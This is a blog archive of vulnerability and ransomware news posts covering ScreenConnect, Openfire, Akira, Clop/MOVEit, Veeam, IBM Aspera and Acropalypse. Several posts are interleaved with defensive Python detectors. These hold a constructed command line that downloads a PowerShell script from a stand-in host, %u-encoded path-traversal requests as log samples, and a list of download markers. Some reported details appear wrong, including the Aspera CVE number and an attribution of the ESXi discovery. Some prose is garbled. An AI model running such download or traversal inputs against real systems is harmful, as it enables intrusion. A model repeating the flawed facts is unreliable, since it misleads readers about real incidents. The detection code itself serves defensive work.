Showing posts with label Vulnerability.

Ransomware Distributed Through Mass Exploitation of ConnectWise ScreenConnect

Shortly after reports emerged regarding a significant security flaw in the ConnectWise ScreenConnect remote desktop management service, researchers are sounding the alarm about a potential large-scale supply chain attack.

Kyle Hanslovan, CEO of Huntress, expressed concerns about the exploitation of these vulnerabilities, warning that hackers could potentially infiltrate thousands of servers controlling numerous endpoints. He cautioned that this could lead to what might become the most significant cybersecurity incident of 2024. ScreenConnect's functionality, often used by tech support and others for remote authentication, poses a risk of unauthorized access to critical endpoints.

Compounding the issue is the widespread adoption of ScreenConnect by managed service providers (MSPs) to connect with customer environments. This mirrors previous incidents like the Kaseya attacks in 2021, where MSPs were exploited for broader access to downstream systems.

ConnectWise addressed the vulnerabilities without assigning CVEs initially, but subsequent proof-of-concept exploits emerged swiftly. By Tuesday, ConnectWise acknowledged active cyberattacks exploiting these bugs, and by Wednesday, multiple researchers reported increasing cyber activity.

The vulnerabilities now have designated CVEs, including a severe authentication bypass flaw (CVE-2024-1709) and a path traversal issue (CVE-2024-1708) enabling unauthorized file access.

The Shadowserver Foundation reported thousands of vulnerable instances exposed online, primarily in the US, with significant exploitation observed in the wild.

According to Huntress researchers, initial access brokers (IABs) are leveraging these bugs to gain access to various endpoints, intending to sell this access to ransomware groups. There have been instances of ransomware attacks targeting local governments, including endpoints potentially linked to critical systems like 911 services.

Bitdefender researchers corroborated these findings, noting the use of malicious extensions to deploy downloaders capable of installing additional malware.

The US Cybersecurity and Infrastructure Security Agency (CISA) added these vulnerabilities to its Known Exploited Vulnerabilities catalog.

Mitigation measures include applying patches released with ScreenConnect version 23.9.8 and monitoring for indicators of compromise (IoCs) as advised by ConnectWise. Additionally, organizations should vigilantly observe their systems for suspicious files and activities.

ConnectWise's actions to revoke licenses for unpatched servers offer some hope, although the severity of the situation remains a concern for anyone running vulnerable versions or failing to patch promptly.

Recent Vulnerability Puts 3,000 Openfire Servers at Risk of Attack

More than 3,000 instances of Openfire servers have not undergone patching to address a recent vulnerability, leaving them susceptible to potential attacks exploiting a newly discovered exploit, according to a report by VulnCheck, a firm specializing in vulnerability intelligence.

Openfire, developed by Ignite Realtime, functions as a cross-platform real-time collaboration server written in Java. Operating on the XMPP protocol, it allows web interface administration.

The vulnerability, identified as CVE-2023-32315, is classified as high-severity and pertains to Openfire's administration console. It is characterized as a path traversal flaw within the setup environment, enabling unauthorized attackers to gain entry to restricted sections of the admin console.

The root of the problem stems from Openfire's inadequate protection against specific non-standard URL encoding for UTF-16 characters. The webserver's lack of support for these characters allowed the inclusion of the new encoding without an accompanying update to the protection measures.

All Openfire releases from version 3.10.0, launched in April 2015, onward are affected; the flaw was remediated in versions 4.7.5 and 4.6.8, issued in May 2023.

Exploitations of this vulnerability have been observed over a span of more than two months. Cyber threat actors have been establishing fresh user accounts in the admin console to introduce a new plugin. This plugin houses a remote web shell, affording the attackers the ability to execute arbitrary commands and infiltrate server data.

Publicly available exploits targeting CVE-2023-32315 adhere to a uniform pattern. However, VulnCheck asserts the identification of a novel exploit path that doesn't necessitate the creation of an administrative user account.

VulnCheck has identified a total of over 6,300 accessible Openfire servers on the internet. Of these, around half have either been patched against the vulnerability, run non-vulnerable older versions, or are divergent forks that might remain unaffected.

The firm highlights that approximately 50% of externally facing Openfire servers operate on the impacted versions. Despite their relatively small number, the firm underscores the significance of this issue due to the trusted role these servers hold in connection with chat clients.

The vulnerability's implications allow an attacker lacking authentication to access the plugin administration endpoint. This provides the attacker with the capability to directly upload the plugin and subsequently access the web shell, all without authentication.

VulnCheck clarifies that this strategy avoids triggering login notifications in the security audit log, ensuring a discreet operation. The absence of a security audit log entry is notable, as it eliminates evidence of the breach. 

While signs of malicious activity might be present in the openfire.log file, the attacker can exploit the path traversal to eliminate the log through the web shell. This leaves the plugin as the sole compromise indicator, an aspect of the situation that VulnCheck warns about.
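As an added illustration of the encoding problem and of what is left behind in the logs (example code written for this page, not VulnCheck's or Openfire's), the Python below reads constructed access-log lines, decodes the non-standard %uXXXX form (a UTF-16 code unit, so %u002e is a '.') before applying the usual %XX decoding, and flags both any request that uses the non-standard form at all and any request whose fully decoded path contains a '..' segment. The log format, the sample paths and the IP addresses are assumptions; Openfire's real request handling is not reproduced.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines for illustration only; they are not from
# the article, from VulnCheck, or from any real Openfire deployment.
SAMPLE_LOG = """\
10.0.0.5 - - [20/Aug/2023:10:01:02 +0000] "GET /login.jsp HTTP/1.1" 200 1532
10.0.0.7 - - [20/Aug/2023:10:01:09 +0000] "GET /setup/%u002e%u002e/admin-page.jsp HTTP/1.1" 200 884
10.0.0.9 - - [20/Aug/2023:10:02:30 +0000] "GET /plugins/search/search-form.jsp HTTP/1.1" 200 221
10.0.0.9 - - [20/Aug/2023:10:03:11 +0000] "GET /setup/..%2f..%2fadmin-page.jsp HTTP/1.1" 403 0
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')
# Non-standard %uXXXX escapes carry a UTF-16 code unit; a filter that only
# understands standard %XX escapes never sees what they decode to.
U_ESCAPE_RE = re.compile(r"%u([0-9a-fA-F]{4})")


def decode_nonstandard(path: str) -> str:
    """Decode %uXXXX escapes, then standard %XX escapes, the way a server that
    accepts both encodings would before resolving the path."""
    path = U_ESCAPE_RE.sub(lambda m: chr(int(m.group(1), 16)), path)
    return unquote(path)


def traverses(path: str) -> bool:
    """True if any segment of the fully decoded path is '..'."""
    return any(segment == ".." for segment in path.split("/"))


def analyze(log_text: str) -> list:
    """Flag requests that use %u encoding at all (the server is not expected
    to receive it) and requests whose decoded path walks up a directory."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        raw = match.group("path")
        decoded = decode_nonstandard(raw)
        reasons = []
        if U_ESCAPE_RE.search(raw):
            reasons.append("nonstandard-u-encoding")
        if traverses(decoded):
            reasons.append("path-traversal")
        if reasons:
            findings.append({"line": lineno, "raw": raw,
                             "decoded": decoded, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(finding)
```

In the constructed sample, the fourth line shows why decoding order matters: the standard-encoded attempt is rejected with a 403, while the %u-encoded request on line 2 is served with a 200 because the access filter never saw the decoded segment. Since the report notes that an attacker can use the web shell to remove openfire.log, run this kind of check against a copy of the logs shipped off the host, not against the server's own files.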

“This vulnerability has already been exploited in the wild, likely even by a well-known botnet. With plenty of vulnerable internet-facing systems, we assume exploitation will continue into the future,” VulnCheck concludes.

Cyberattack Strikes Australian Energy Software Company Energy One

Energy One, an Australian company specializing in software solutions and services for the energy industry, has fallen victim to a cyber assault.

In an announcement made on Monday, the company revealed that the breach was identified on August 18 and had repercussions for certain internal systems both in Australia and the United Kingdom.

“As part of its work to ensure customer security, Energy One has disabled some links between its corporate and customer-facing systems,” Energy One said.

Energy One is actively engaged in an inquiry to ascertain the extent of the impact on customer-related systems and personal data. The organization is also committed to tracing the initial point of intrusion employed by the attacker.

Though detailed specifics about the attack are presently undisclosed, the company's official statement strongly suggests the possibility of a deliberate ransomware attack.

To facilitate the investigation, cybersecurity specialists have been enlisted, and competent authorities in both Australia and the UK have been informed about the incident.

According to a recent report by Searchlight Cyber, a British threat intelligence firm, malevolent actors have been peddling opportunities for initial access into energy sector enterprises globally, with prices ranging from $20 to $2,500.

Perpetrators of cybercrime can exploit various avenues, including Remote Desktop Protocol (RDP) access, compromised login credentials, and vulnerabilities in devices like Fortinet products.

This Ransomware Targets Several English-Speaking Nations

According to findings by Cisco Talos, a group of researchers, a fresh variant of ransomware is suspected to be employed in a series of attacks on entities situated in China, Vietnam, Bulgaria, and a number of English-speaking nations. 

The cybersecurity experts disclosed on Monday that they have come across a hitherto unidentified threat actor, reportedly based in Vietnam, who has been launching these attacks since as far back as June 4.

This newly identified malware is a modified version of the Yashma ransomware. It's worth noting that the Yashma strain had become significantly less active following the release of a decryption tool last year.

“Talos assesses with high confidence that this threat actor is targeting victims in English-speaking countries, Bulgaria, China and Vietnam, as the actor’s GitHub account, ‘nguyenvietphat,’ has ransomware notes written in these countries’ languages. The presence of an English version could indicate the actor intends to target a wide range of geographic areas,” the researchers said in a report.

“The threat actor may be of Vietnamese origin because their GitHub account name and email contact on the ransomware notes spoofs a legitimate Vietnamese organization’s name. The ransom note also asks victims to contact them between 7 and 11 p.m. UTC+7, which overlaps with Vietnam’s time zone.”

The perpetrator's ransom note closely resembles that of WannaCry, a notorious ransomware that gained widespread attention in 2017 due to its high-profile attacks. The ransom note is available in multiple languages, including English, Bulgarian, Vietnamese, and Chinese.

If victims fail to make the payment within three days, the ransom amount will double. The attackers have provided a Gmail address for communication. Interestingly, the ransom note lacks a specified ransom amount, and the Bitcoin account shared in the note doesn't contain any funds, suggesting that the operation might still be in its early stages.

Upon encrypting victim systems, the wallpaper is changed to display a message asserting that all files have been encrypted.

According to Cisco Talos, the Yashma ransomware is essentially a rebranded version of Chaos ransomware, which first emerged in May 2022. After a thorough examination of Yashma's features by BlackBerry security researchers last year, Cisco Talos observed that the new variant mostly retains the core elements of the original ransomware.

One significant change highlighted by Cisco Talos is that this new variant no longer embeds the ransom note within the ransomware itself. Instead, it retrieves the ransom note from a GitHub repository controlled by the threat actors. This modification is intended to evade endpoint detection solutions and antivirus software, which typically detect ransom note strings embedded in the binary.

Another noteworthy characteristic preserved in this variant is Yashma's anti-recovery capability. This involves wiping the content of the original unencrypted files, replacing them with a single character '?' before deleting the file altogether. This tactic complicates efforts by incident responders and forensic analysts to recover deleted files from the victim's hard drive.

Various organizations monitoring ransomware attacks have noted a substantial increase in the emergence of different strains. FortiGuard Labs reported a significant uptick in the growth of ransomware variants, largely attributed to the adoption of Ransomware-as-a-Service (RaaS).

Ransomware expert Allan Liska from Recorded Future pointed out that many so-called "new" ransomware strains are essentially variations of previously released versions. Data gathered by his team demonstrated that fewer than 25% of the supposed 328 "new" ransomware variants are genuinely novel.

ESXi Servers are Targeted by Linux-Based Akira Ransomware
The Akira ransomware operation is now encrypting VMware ESXi virtual machines with a Linux encryptor, blocking access to the virtual machines. The move follows a couple of months in which the group targeted Windows systems.

The Linux encryptor lets Akira encrypt ESXi virtual machines in double-extortion attacks against companies worldwide, an adaptation that extends the reach of the operation across the globe.

Akira was first observed in March 2023 and, as one of the newest arrivals in the ransomware landscape, is still relatively little known.

In its short time in operation, Akira has been confirmed to have affected 45 organizations, most of them based in the U.S. The targets range from childcare centers to large financial institutions.

The threat actors run double-extortion attacks against their victims: they steal data from breached networks, encrypt files, and then demand payouts of several million dollars.

The gang's leak blog lists several victims, among them asset managers. Once an attack is launched, Akira encrypts the organization's files and appends its extension to their names. A ransom note is then displayed on the desktop, explaining in a condescending tone that paying the ransom is the quickest way back to normal operations.

The Development Bank of Southern Africa and London Capital Group are fully aware of the damage done to them, and many US-based companies appear on the gang's dark web blog.

Akira's double-extortion technique means the data is copied before it is encrypted, so the attackers can threaten to release the stolen information as well as withhold the decryption key, using both levers to force a company to pay the ransom.

In some cases, the ransoms amount to more than a million dollars, while in others they are less. So far the group has focused on professional services, education, manufacturing, and research and development.

In sectors as diverse as education and finance, Akira has disrupted corporate networks and encrypted data on breached networks. Encrypted files are marked with the .akira extension.

Once Akira runs, files with many different extensions and names are encrypted and renamed with the .akira extension, and a ransom note titled akira_readme.txt is left in each folder on the encrypted device.

The Linux version of Akira accepts options, including the percentage of each file to encrypt, which lets threat actors tailor their attacks. Its tendency to skip folders and files usually associated with Windows suggests it was ported from the Windows version of the encryptor.
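To show how the indicators above look in practice, here is an added Python example (written for this page, not Akira's code or anyone's published tooling) that sweeps a directory tree for the akira_readme.txt note and the .akira extension and, because the Linux build can encrypt only a percentage of each file, measures block by block how much of each renamed file is actually high-entropy. The fixture it scans is constructed in a temporary directory: seeded random bytes stand in for ciphertext and repeated text for untouched data; the entropy threshold and block size are assumptions.

```python
import math
import os
import random
import tempfile
from pathlib import Path

# Indicators named in the report: the appended extension and the note in each folder.
ENCRYPTED_EXT = ".akira"
RANSOM_NOTE = "akira_readme.txt"
CHUNK = 4096           # block size for the entropy scan (assumption)
HIGH_ENTROPY = 7.5     # bits/byte; ciphertext sits near 8.0, documents far below


def shannon_entropy(data: bytes) -> float:
    """Bits per byte of a block; the usual first-pass test for encrypted content."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def encrypted_fraction(path: Path) -> float:
    """Fraction of CHUNK-sized blocks that look encrypted. A partially encrypted
    file shows a run of high-entropy blocks followed by untouched ones."""
    total = high = 0
    with path.open("rb") as fh:
        while block := fh.read(CHUNK):
            total += 1
            if shannon_entropy(block) > HIGH_ENTROPY:
                high += 1
    return high / total if total else 0.0


def sweep(root: Path) -> dict:
    """Walk a tree and collect ransom notes, renamed files (with how much of each
    is really encrypted) and unrenamed files that nevertheless look encrypted."""
    report = {"ransom_notes": [], "encrypted": [], "other_high_entropy": []}
    for dirpath, _, files in os.walk(root):
        for name in sorted(files):
            path = Path(dirpath) / name
            rel = path.relative_to(root).as_posix()
            if name == RANSOM_NOTE:
                report["ransom_notes"].append(rel)
                continue
            fraction = round(encrypted_fraction(path), 2)
            if path.suffix == ENCRYPTED_EXT:
                report["encrypted"].append({"path": rel, "fraction": fraction})
            elif fraction > 0:
                report["other_high_entropy"].append({"path": rel, "fraction": fraction})
    return report


def build_sample_tree(root: Path) -> None:
    """Constructed fixture standing in for a hit file share; not real Akira output.
    Seeded random bytes model ciphertext, repeated text models untouched data."""
    rng = random.Random(7)
    text = (b"quarterly figures, nothing unusual here\n" * 200)[:CHUNK]
    (root / "finance").mkdir()
    # fully encrypted: every block is ciphertext
    (root / "finance" / "q1.xlsx.akira").write_bytes(rng.randbytes(CHUNK * 4))
    # partially encrypted: first quarter is ciphertext, the rest is original content
    (root / "finance" / "q2.xlsx.akira").write_bytes(rng.randbytes(CHUNK) + text * 3)
    (root / "finance" / RANSOM_NOTE).write_text("placeholder note text (constructed)\n")
    (root / "readme.txt").write_text("untouched file\n" * 50)


def demo() -> dict:
    """Build the fixture in a temporary directory and sweep it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        build_sample_tree(root)
        return sweep(root)


if __name__ == "__main__":
    print(demo())
```

The fraction column is the useful part for responders: a value well below 1.0 on a renamed file means most of the original bytes are still present, which matters when deciding what can be recovered and when comparing the operator's chosen percentage across hosts.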

Akira's expanding scope, with organizations around the world now facing the threat, illustrates the urgency of action. Ransomware groups are increasingly extending their operations to Linux platforms, many of them using readily available tools to do so, because it has proved a simple and lucrative way to maximize profits.

Notable ransomware operations that use Linux-based encryptors, several of which predominantly target VMware ESXi servers, include Royal, Black Basta, LockBit, BlackMatter, AvosLocker, HelloKitty, RansomEXX, and Hive.

Spreads Rapidly, is Widely Popular, and is Unsecured 

ESXi servers are popular targets because ransomware spreads through them rapidly: a single run of the encryptor on the hypervisor launches the attack across the virtual machines it hosts, making it extremely fast. They are also widespread in the enterprise, as ESXi is among the most widely used hypervisors on the planet. Lastly, these hosts usually have no security solutions installed; a CrowdStrike report previously noted that antivirus software simply isn't supported by the manufacturer.

Over the weekend of February 2-6, ESXi servers were hit by thousands of simultaneous attacks exploiting a vulnerability that had been known for two years. Good server security matters because research into such problems can take a long time and is not always easy: Mandiant had identified the issue in 2022, before it was exploited at scale, yet it remained little known.

Uncovered: Clop Ransomware's Lengthy Zero-Day Testing on the MOVEit Platform
Security experts have uncovered shocking evidence that the notorious Clop ransomware group has spent extensive time testing zero-day vulnerabilities in the popular MOVEit platform since 2021, according to recent reports. The findings have raised serious concerns about the exposure of affected systems, and affected organizations and security agencies have taken urgent action to close these vulnerabilities. The discovery highlights how sophisticated ransomware attacks are becoming and how critical robust defensive measures are for mitigating such threats.

There is now close work collaboration between authorities and the parties affected by the breach to investigate this incident and develop appropriate countermeasures. 

Researchers examined a recent Clop data theft attack aimed at vulnerable MOVEit Transfer instances and found that the technique used to deploy the recently revealed LemurLoot web shell matched the technique the gang had used earlier against vulnerable MOVEit Transfer instances. Using logs from some affected clients' networks, they determined which clients were affected.

A joint advisory issued by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) warns of active exploitation of a recently discovered critical vulnerability in Progress Software's MOVEit Transfer application, with ransomware now being dropped on internet-facing systems as a result.

Kroll researchers performed a forensic review and determined that the Clop cybergang may have been experimenting with the now-patched file transfer vulnerability (CVE-2023-34362) as early as July 2021.

The BBC, British Airways, the UK drugstore chain Boots, the Halifax provincial government and the payroll company Zellis are among the organizations that reported their data was exfiltrated by the group at the end of last month. Vodafone, the BBC and Boots, which used Zellis' services to store employee data, suffered a breach of employee data through that route.

The Russian-backed Clop organization, also known as Lace Tempest, TA505, and FIN11, has claimed responsibility for attacks that exploited Fortra’s GoAnywhere Managed File Transfer solution by exploiting a zero-day vulnerability. Over 130 organizations have been targeted and over one million patients' data has been compromised as a result. 

A joint advisory issued by the Federal Bureau of Investigation and the Cybersecurity and Infrastructure Security Agency reported on Wednesday that the exploitation of the MOVEit Transfer SQL injection vulnerability resembled a 2020-21 campaign in which the group installed a DEWMODE web shell on Accellion FTA servers.

It has also been discovered that the threat actors were testing methods for gathering and extracting sensitive data from compromised MOVEit Transfer servers as far back as April 2022, probably using automated tools, and that these methods may have been used to gain access to servers.

In addition to the 2022 activity, in the weeks leading up to last month's attacks the actors appear to have tested access to organizations by automated means and pulled back information from MOVEit Transfer servers, using it to determine which organizations they were accessing.

During the malicious activity, specific MOVEit Transfer users' Organization IDs ("Org IDs") appeared to be exfiltrated, which would have allowed Clop to determine which organizations to target.

Clop has claimed responsibility for the MOVEit attacks on its website and invites victims to contact it before July 14 if they do not want their names posted there. The group has offered examples of data that has been exfiltrated and of data already published after ransom negotiations failed, although a ransom deal would not guarantee that the stolen data remains secure.

In a LinkedIn post, Charles Carmakal, CEO of Mandiant Consulting, expressed surprise at the number of MOVEit victims, which he characterized as "overwhelming."

Targeted: Hackers Exploit Vulnerable Veeam Backup Servers with FIN7 Tactics

Cyberattacks on vulnerable Veeam backup servers exposed online

Veeam Backup and Replication software is a popular choice for many organizations to protect their critical data. However, recent reports have revealed that hackers are targeting vulnerable Veeam backup servers that are exposed online, leaving organizations at risk of data theft and other cyberattacks. 

There is evidence that at least one group of threat actors, who have been associated with several high-profile ransomware gangs, are targeting Veeam backup servers. 

Starting from March 28th, there have been reported incidents of malicious activity and tools similar to FIN7 attacks being used to exploit a high-severity vulnerability in the Veeam Backup and Replication (VBR) software. 

This vulnerability, tracked as CVE-2023-27532, exposes encrypted credentials stored in the VBR configuration to unauthenticated users, potentially allowing unauthorized access to the backup infrastructure hosts.

The software vendor addressed the vulnerability on March 7 and offered instructions for implementing workarounds. However, on March 23, a pentesting company named Horizon3 released an exploit for CVE-2023-27532, which showed how the credentials could be extracted in plain text using an unsecured API endpoint. 

The exploit also allowed attackers to run code remotely with the highest privileges. Despite the fix, Huntress Labs reported that roughly 7,500 internet-exposed VBR hosts were still susceptible to the vulnerability.

Evidence of FIN7 tactics used in recent attacks

A recent report by cybersecurity and privacy company WithSecure reveals that attacks in late March targeted servers running Veeam Backup and Replication software that was publicly accessible. The techniques used in these attacks were similar to those previously associated with FIN7. 

The researchers deduced that the attacker exploited the CVE-2023-27532 vulnerability, given the timing of the campaign, the presence of open TCP port 9401 on compromised servers, and the vulnerable version of VBR running on the affected hosts. 

During a threat hunt exercise using telemetry data from WithSecure's Endpoint Detection and Response (EDR), the researchers discovered Veeam servers generating suspicious alerts such as sqlservr.exe spawning cmd.exe and downloading PowerShell scripts.
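The alert described above can be expressed as a process-lineage rule. The Python below is an added example for this page (not WithSecure's detection logic) that runs two checks over constructed EDR process-creation events: sqlservr.exe spawning cmd.exe, and a PowerShell process with a download command anywhere beneath a sqlservr.exe ancestor. The event records, file paths, the VEEAMSQL instance name and the download URL (example.invalid) are placeholders.

```python
import ntpath
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record as an EDR would emit it."""
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed process-creation events for illustration; not WithSecure telemetry.
# Paths, the instance name and the download URL are placeholders.
EVENTS = [
    ProcEvent(600, 4, r"C:\Windows\System32\services.exe", "services.exe"),
    ProcEvent(800, 600, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(1000, 600, r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe",
              "sqlservr.exe -sVEEAMSQL"),
    ProcEvent(1400, 1000, r"C:\Windows\System32\cmd.exe",
              'cmd.exe /c powershell -c "Invoke-WebRequest http://example.invalid/u.ps1 -OutFile u.ps1"'),
    ProcEvent(1410, 1400, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell -c "Invoke-WebRequest http://example.invalid/u.ps1 -OutFile u.ps1"'),
    ProcEvent(2000, 800, r"C:\Windows\System32\cmd.exe", "cmd.exe"),            # admin's shell
    ProcEvent(2100, 2000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -c Get-Date"),                                         # benign
]

# Command-line fragments that fetch content from the network.
DOWNLOAD_MARKERS = ("invoke-webrequest", "iwr ", "downloadstring", "downloadfile",
                    "net.webclient", "start-bitstransfer", "curl ")


def image_name(event: ProcEvent) -> str:
    """Lower-cased file name of the process image (handles Windows paths anywhere)."""
    return ntpath.basename(event.image).lower()


def lineage(index: dict, pid: int) -> list:
    """Image names from the process up through its ancestors (loop-safe)."""
    chain, seen = [], set()
    while pid in index and pid not in seen:
        seen.add(pid)
        chain.append(image_name(index[pid]))
        pid = index[pid].ppid
    return chain


def detect(events: list) -> list:
    """Two rules from the report: the database engine spawning a shell, and a
    PowerShell download anywhere under a sqlservr.exe lineage."""
    index = {e.pid: e for e in events}
    findings = []
    for event in events:
        name = image_name(event)
        parent = index.get(event.ppid)
        if name == "cmd.exe" and parent is not None and image_name(parent) == "sqlservr.exe":
            findings.append({"pid": event.pid, "rule": "sqlservr-spawns-cmd",
                             "chain": lineage(index, event.pid)})
        if name in ("powershell.exe", "pwsh.exe"):
            chain = lineage(index, event.pid)
            lowered = event.cmdline.lower()
            if "sqlservr.exe" in chain and any(m in lowered for m in DOWNLOAD_MARKERS):
                findings.append({"pid": event.pid, "rule": "sqlservr-lineage-powershell-download",
                                 "chain": chain})
    return findings


if __name__ == "__main__":
    for finding in detect(EVENTS):
        print(finding)
```

The lineage walk is what keeps the rule useful when the attacker adds layers between the database engine and the script host: the benign administrator shell under explorer.exe runs the same binaries and is left alone because sqlservr.exe is nowhere in its ancestry.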

Compounding the vulnerability, some organizations use insecure configurations when setting up their Veeam backup servers, leaving them accessible over the Internet. Hackers can then exploit these weaknesses to gain access to sensitive data and files.

One of the most common attack methods is through brute-force attacks. In this method, hackers use automated tools to try different username and password combinations until they gain access to the Veeam backup server. They can also use other methods like social engineering or spear-phishing to get hold of credentials or trick users into installing malware on their systems.

Once the hackers have gained access, they can steal the backup files, modify or delete them, or use them to launch further attacks on the organization's systems. The impact of such attacks can be severe, causing loss of critical data, disruption to business operations, and significant financial losses.

Mitigating the risk of cyberattacks on Veeam backup servers

To prevent such attacks, organizations need to ensure that their Veeam backup servers are properly secured. This includes configuring the server to only allow access from trusted networks, implementing strong password policies, and keeping the software up-to-date with the latest security patches.

Additionally, organizations should consider implementing multi-factor authentication (MFA) to provide an extra layer of security. MFA requires users to provide more than one form of identification, such as a password and a one-time code sent to their mobile device, making it more difficult for hackers to gain access even if they have obtained login credentials.

Regular security audits and vulnerability assessments can also help identify potential weaknesses and enable organizations to take proactive measures to mitigate them before hackers can exploit them.

Veeam backup servers are a critical component of an organization's data protection strategy, and securing them should be a top priority. Organizations must take necessary steps to ensure that their Veeam backup servers are properly secured and not exposed to the internet. 

By taking these necessary steps, organizations can significantly reduce the risk of a security breach and protect their critical data from falling into the wrong hands. It is always better to be proactive and take preventive measures rather than deal with the aftermath of a cyberattack.


The Urgent Need to Address the Critical Bug in IBM's Aspera Faspex

IBM's widely used Aspera Faspex has been found to have a critical vulnerability with a 9.8 CVSS rating, which could have serious consequences for organizations using the software. This blog will discuss the vulnerability in detail and the importance of taking prompt action to mitigate the risk.

IBM Vulnerability | An Overview

IBM's widely used Aspera Faspex file transfer system has a serious problem. A critical bug that could allow hackers to run any code they want is being used by cybercriminals, including ransomware groups. Even though IBM has released a patch to fix the issue, many organizations have failed to install it. 

Researchers are warning that this vulnerability is being exploited, and one of their customers was recently hacked due to this problem. It's important to take immediate action to fix this vulnerability to avoid being targeted by hackers.

What is Aspera Faspex?

Aspera Faspex is a software application that provides secure file transfer capabilities to businesses and organizations. It is widely used across various industries, including media and entertainment, healthcare, finance, and government agencies.

Understanding the Vulnerability

The vulnerability (CVE-2022-5859) in Aspera Faspex version 4.1.3 and earlier versions arises from insufficient validation of user-supplied input in the software. Attackers could exploit this vulnerability by sending specially crafted data to the application, leading to arbitrary code execution. This could enable attackers to bypass authentication and execute code on the vulnerable system, which could result in significant data breaches and other security incidents.

The Impact of the Vulnerability

The vulnerability in Aspera Faspex is considered critical, with a CVSS rating of 9.8 out of 10. This means that it is highly exploitable and could have severe consequences for organizations using the software. Attackers could gain unauthorized access to sensitive data, execute malicious code, and cause significant disruptions to business operations.

The Importance of Timely Patching

IBM has recommended that organizations using the affected version of the software should upgrade to a patched version as soon as possible to address the vulnerability. Timely patching is critical in mitigating the risk of cyberattacks and data breaches. Organizations that delay patching are putting themselves at increased risk of cyberattacks and other security incidents.

The Role of Security Hygiene

In addition to timely patching, implementing robust security measures is crucial in preventing cyberattacks and minimizing the impact of security incidents. IBM has emphasized the importance of following standard security practices, including network segmentation and monitoring for unusual behavior. These security measures can help organizations detect and respond to security incidents in a timely manner.

The Significance of the Aspera Faspex Vulnerability

The Aspera Faspex vulnerability is a reminder of the importance of prioritizing security in any organization. With the evolving security landscape, organizations must remain vigilant and continuously update their security measures to mitigate the risk of cyberattacks and other security incidents. Failure to take prompt action in addressing vulnerabilities could have severe consequences for organizations, including financial losses, reputational damage, and legal implications.

Microsoft Conducts an Emergency Fix for the Notorious ‘Acropalypse’ Bug

Microsoft has moved quickly to patch the ‘acropalypse’ bug discovered earlier this week. The bug could apparently allow information cropped out of images with the Windows screenshot tools to be recovered.

According to BleepingComputer, Microsoft has now issued an OOB (out-of-band or emergency) update that patches the aforementioned issue, technically named CVE-2023-28303. Microsoft is now urging users to apply the update as soon as possible. 

Furthermore, the update is not difficult to apply. All that the user has to do is click the Library icon in Microsoft Store, then pick Get updates (top right). Doing so will enable the patch to be applied if it has not already been installed automatically. 

Carry on Cropping 

The acropalypse bug shares some similarities with the vulnerability that affected the Markup feature on Google Pixel phones: images and screenshots cropped in the Windows 11 Snipping Tool and the Windows 10 Snip and Sketch tool could likewise be compromised.

CVE-2023-28303 means that parts of a PNG or JPEG image that have been cropped out are not completely removed from the file when it is saved again. These cropped sections could include a variety of sensitive information, such as bank account credentials or medical records.

It is important to note that applying the patch cannot fix any file that has already been cropped; it only protects images edited in the future. Users must re-crop any existing images to ensure that the excess parts of the picture have been properly removed.
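To make the failure mode concrete, here is an added Python example (not Microsoft's code, and not a recovery tool) that builds a small PNG, models a crop being written over the original file without truncation, and audits the result by walking the chunk list: a well-formed PNG ends exactly at its IEND chunk, so any bytes after it are leftover content. The image contents and the in-place overwrite model are constructed for the demo; the audit itself applies to any PNG you want to verify before sharing.

```python
import random
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def _chunk(ctype: bytes, payload: bytes) -> bytes:
    """Serialize one PNG chunk: length, type, payload, CRC over type+payload."""
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)


def make_png(width: int, height: int, seed: int = 0) -> bytes:
    """Minimal valid 8-bit RGB PNG filled with seeded noise so that a larger
    image really is a larger file. Constructed test data, not a real screenshot."""
    rng = random.Random(seed)
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)
    raw = b"".join(b"\x00" + rng.randbytes(width * 3) for _ in range(height))
    return (PNG_SIGNATURE + _chunk(b"IHDR", ihdr)
            + _chunk(b"IDAT", zlib.compress(raw)) + _chunk(b"IEND", b""))


def audit_png(data: bytes) -> dict:
    """Walk the chunk list up to IEND and report anything that follows it.
    A well-formed PNG ends exactly at IEND; trailing bytes are leftover content."""
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG file")
    pos, chunks, iend_end = len(PNG_SIGNATURE), [], None
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        end = pos + 12 + length                    # header + payload + CRC
        if end > len(data):
            break                                  # truncated chunk
        chunks.append(ctype.decode("ascii"))
        pos = end
        if ctype == b"IEND":
            iend_end = pos
            break
    trailing = len(data) - iend_end if iend_end is not None else 0
    return {"chunks": chunks, "iend_end": iend_end, "trailing_bytes": trailing,
            "clean": iend_end is not None and trailing == 0}


def overwrite_without_truncate(original: bytes, replacement: bytes) -> bytes:
    """Model of the failure mode: the new, shorter file is written over the old
    one in place and the file is not truncated, so the old tail survives past
    IEND. A constructed model of the behaviour described, not Microsoft's code."""
    if len(replacement) >= len(original):
        return replacement
    return replacement + original[len(replacement):]


def check_cropped_file(original: bytes, cropped_save: bytes) -> dict:
    """How a crop of `original`, saved the faulty way, would audit."""
    return audit_png(overwrite_without_truncate(original, cropped_save))


if __name__ == "__main__":
    full = make_png(64, 64, seed=1)
    crop = make_png(8, 8, seed=1)
    print(audit_png(crop))                 # clean: ends at IEND
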